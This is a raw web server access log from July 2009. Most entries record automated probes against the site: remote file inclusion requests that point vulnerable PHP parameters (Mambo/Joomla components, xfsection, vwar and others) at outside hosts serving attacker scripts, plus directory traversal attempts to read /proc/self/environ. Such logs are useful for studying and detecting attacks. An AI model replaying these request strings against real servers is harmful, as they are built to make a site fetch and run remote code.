58.72.53.116 - - [06/Jul/2009:04:09:23 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/images/news.jpg??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
213.92.85.176 - - [06/Jul/2009:04:09:23 -0400] "GET /logs/access_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.46.177.182 - - [06/Jul/2009:04:09:32 -0400] "GET /logs/access_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
74.223.143.131 - - [06/Jul/2009:04:09:47 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.223.143.131 - - [06/Jul/2009:04:09:47 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.223.143.131 - - [06/Jul/2009:04:09:47 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
213.92.85.176 - - [06/Jul/2009:04:09:51 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:04:09:51 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:04:09:51 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:04:09:56 -0400] "GET /logs/access_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
74.223.143.131 - - [06/Jul/2009:04:10:11 -0400] "GET /logs/access_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.171.190.110 - - [06/Jul/2009:04:11:53 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:04:11:53 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:04:11:54 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:04:12:25 -0400] "GET /logs/access_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
200.226.134.29 - - [06/Jul/2009:04:12:42 -0400] "GET /logs/error_log.Q109052300//atom.php5?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:12:42 -0400] "GET /logs/error_log.Q109052300//atom.php5?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:12:42 -0400] "GET //atom.php5?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:12:42 -0400] "GET //atom.php5?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:12:42 -0400] "GET /logs//atom.php5?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:12:42 -0400] "GET /logs//atom.php5?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
89.171.190.110 - - [06/Jul/2009:04:12:43 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:04:12:44 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:04:12:44 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:12:55 -0400] "GET /logs/access_log.Q109060800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.226.134.29 - - [06/Jul/2009:04:13:00 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
200.226.134.29 - - [06/Jul/2009:04:13:00 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://www.avanceinternet.com/cms/media/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
122.214.48.150 - - [06/Jul/2009:04:13:02 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:04:13:06 -0400] "GET /logs/access_log.Q109052200%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
67.19.130.218 - - [06/Jul/2009:04:13:07 -0400] "GET /logs/error_log.Q109051400%20//modules/xfsection/modify.php?dir_module=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
89.171.190.110 - - [06/Jul/2009:04:13:09 -0400] "GET /logs/access_log.Q109052500//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.135.42.164 - - [06/Jul/2009:04:13:11 -0400] "GET /logs/error_log.Q109062200//components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.135.42.164 - - [06/Jul/2009:04:13:11 -0400] "GET //components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.135.42.164 - - [06/Jul/2009:04:13:11 -0400] "GET /logs//components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.92.85.176 - - [06/Jul/2009:04:13:14 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.135.42.164 - - [06/Jul/2009:04:13:16 -0400] "GET /logs/access_log.Q109062300//components/com_fabrik/fabrik_functions.php?mosConfgi_absolute_path=http://www.alandar.net/www2/log1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:04:14:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.50.187.235 - - [06/Jul/2009:04:14:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
195.50.187.235 - - [06/Jul/2009:04:14:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
195.50.187.235 - - [06/Jul/2009:04:14:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
195.50.187.235 - - [06/Jul/2009:04:14:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
122.214.48.150 - - [06/Jul/2009:04:15:09 -0400] "GET /logs/access_log.Q109060800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
122.214.48.150 - - [06/Jul/2009:04:15:16 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:15:52 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:16:05 -0400] "GET /logs/access_log.Q109051300%20%20/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.80.195.54 - - [06/Jul/2009:04:16:38 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {6220444D-C340-4A05-A1FA-78400212B330}; YPC 3.2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 2.8)"
211.236.242.164 - - [06/Jul/2009:04:17:28 -0400] "GET /logs/access_log.Q109062500/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.236.242.164 - - [06/Jul/2009:04:17:28 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.236.242.164 - - [06/Jul/2009:04:17:29 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
121.189.19.9 - - [06/Jul/2009:04:17:35 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.189.19.9 - - [06/Jul/2009:04:17:35 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.189.19.9 - - [06/Jul/2009:04:18:42 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.189.19.9 - - [06/Jul/2009:04:18:50 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:04:19:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [06/Jul/2009:04:19:09 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:19:16 -0400] "GET /logs/access_log.Q109051300%20%20/e404.php?DOCUMENT_ROOT=http://www.firearts.org/events/_a? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.232.143.238 - - [06/Jul/2009:04:19:17 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
91.121.89.135 - - [06/Jul/2009:04:19:32 -0400] "GET /logs/modules/xfsection/modify.php?dir_module=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:04:19:32 -0400] "GET /logs/access_log.Q109051000/modules/xfsection/modify.php?dir_module=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:04:19:32 -0400] "GET /modules/xfsection/modify.php?dir_module=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:04:20:02 -0400] "GET /logs/access_log.Q109051500//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:04:20:02 -0400] "GET //modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:04:20:02 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:20:04 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:20:05 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:04:20:05 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:04:20:32 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:04:20:35 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.247 - - [06/Jul/2009:04:20:36 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03 HTTP/1.1" 200 61587 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.171.190.110 - - [06/Jul/2009:04:21:30 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:04:21:35 -0400] "GET /logs/access_log.Q109052500%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
65.98.59.178 - - [06/Jul/2009:04:21:43 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
65.98.59.178 - - [06/Jul/2009:04:21:43 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 227 "-" "libwww-perl/5.811"
65.98.59.178 - - [06/Jul/2009:04:21:43 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
65.98.59.178 - - [06/Jul/2009:04:21:48 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
89.171.190.110 - - [06/Jul/2009:04:21:48 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
65.98.59.178 - - [06/Jul/2009:04:21:51 -0400] "GET /logs/access_log.Q109052300//classes/adodbt/sql.php?classes_dir=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 248 "-" "libwww-perl/5.811"
65.98.59.178 - - [06/Jul/2009:04:21:51 -0400] "GET //classes/adodbt/sql.php?classes_dir=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 221 "-" "libwww-perl/5.811"
65.98.59.178 - - [06/Jul/2009:04:21:51 -0400] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.811"
65.98.59.178 - - [06/Jul/2009:04:21:51 -0400] "GET /logs/error_log.Q109052300//classes/adodbt/sql.php?classes_dir=http://www.scd-lunjina.org/drquek//idv6.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
89.171.190.110 - - [06/Jul/2009:04:21:55 -0400] "GET /logs/access_log.Q109052500%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:04:21:56 -0400] "GET /logs/access_log.Q109051000%20%20/modules/xfsection/modify.php?dir_module=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.171.190.110 - - [06/Jul/2009:04:22:12 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yaco-online.com.br/mambots/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.109.250.63 - - [06/Jul/2009:04:22:23 -0400] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
61.109.250.63 - - [06/Jul/2009:04:22:23 -0400] "GET /logs/access_log.Q109051000/modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.109.250.63 - - [06/Jul/2009:04:22:23 -0400] "GET /modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.109.250.63 - - [06/Jul/2009:04:22:24 -0400] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
61.109.250.63 - - [06/Jul/2009:04:22:24 -0400] "GET /modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.109.250.63 - - [06/Jul/2009:04:22:24 -0400] "GET /logs/access_log.Q109051000/modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.109.250.63 - - [06/Jul/2009:04:22:25 -0400] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
61.109.250.63 - - [06/Jul/2009:04:22:25 -0400] "GET /modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
61.109.250.63 - - [06/Jul/2009:04:22:25 -0400] "GET /logs/access_log.Q109051000/modules/xfsection/modify.php?dir_module=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:22:30 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:04:22:31 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:22:31 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:22:31 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:04:22:31 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
85.17.162.28 - - [06/Jul/2009:04:22:32 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:22:32 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/_a? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.162.28 - - [06/Jul/2009:04:22:32 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
62.149.163.198 - - [06/Jul/2009:04:22:37 -0400] "GET /logs/index1.php?dat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
62.149.163.198 - - [06/Jul/2009:04:22:37 -0400] "GET /index1.php?dat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
62.149.163.198 - - [06/Jul/2009:04:22:37 -0400] "GET /logs/access_log.Q109060600/index1.php?dat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
62.149.163.198 - - [06/Jul/2009:04:22:37 -0400] "GET /logs/index1.php?dat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
62.149.163.198 - - [06/Jul/2009:04:22:37 -0400] "GET /index1.php?dat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
62.149.163.198 - - [06/Jul/2009:04:22:37 -0400] "GET /logs/access_log.Q109060600/index1.php?dat=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
85.17.162.28 - - [06/Jul/2009:04:22:46 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:04:22:46 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:04:22:46 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
85.17.162.28 - - [06/Jul/2009:04:22:46 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.firearts.org/events/cfg%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
82.146.59.116 - - [06/Jul/2009:04:22:50 -0400] "GET //components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 250 "-" "libwww-perl/5.826"
87.120.103.5 - - [06/Jul/2009:04:22:53 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
87.120.103.5 - - [06/Jul/2009:04:23:05 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://www.sacvalleyhomes.com/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
195.34.78.110 - - [06/Jul/2009:04:23:28 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:23:28 -0400] "GET //modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:23:29 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:23:31 -0400] "GET //modules/xfsection/modify.php?dir_module=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:23:31 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jul/2009:04:23:31 -0400] "GET /logs/access_log.Q109051000%20%20//modules/xfsection/modify.php?dir_module=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:04:23:37 -0400] "GET //modules/xfsection/modify.php?dir_module=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.231.126.252 - - [06/Jul/2009:04:23:37 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
